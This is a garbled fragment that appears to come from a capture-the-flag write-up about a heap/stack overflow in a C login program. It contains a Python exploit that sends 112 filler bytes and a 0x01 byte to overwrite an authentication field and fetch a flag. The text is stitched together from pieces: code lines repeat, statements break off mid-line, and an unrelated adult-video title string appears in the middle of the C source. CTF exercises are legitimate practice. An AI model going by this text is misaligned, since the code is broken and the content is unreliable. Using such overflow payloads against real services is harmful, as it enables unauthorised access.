def main(): s = socket.create_connection((HOST, PORT)) register(s) login_overwrite(s) get_flag(s) s.close()
int main() setbuf(stdout, NULL); while (1) menu(); int choice = read_int(); switch (choice) case 1: register_user(); break; case 2: login(); break; case 3: show_secret(); break; case 4: exit(0); tokyohot n0541
def login_overwrite(s): menu(s) s.sendall(b'2\n') recvuntil(s, b'Password: ') # 112 filler + 0x01 + newline payload = b'A' * 112 + b'\x01' + b'\n' s.sendall(payload) def main(): s = socket
there is a hidden detail: the program copies the password from the stack buffer into the heap password field using strcpy : def main(): s = socket.create_connection((HOST
if __name__ == "__main__": main() Running the script locally prints: